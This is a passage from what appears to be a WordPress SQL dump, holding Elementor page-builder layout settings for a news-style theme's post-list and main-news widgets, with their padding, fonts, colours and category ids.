select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1280,455,'_elementor_version','0.4'),(1281,455,'_elementor_css','a:3:{s:4:\"time\";i:1508893879;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1283,456,'_elementor_edit_mode','builder'),(1284,456,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_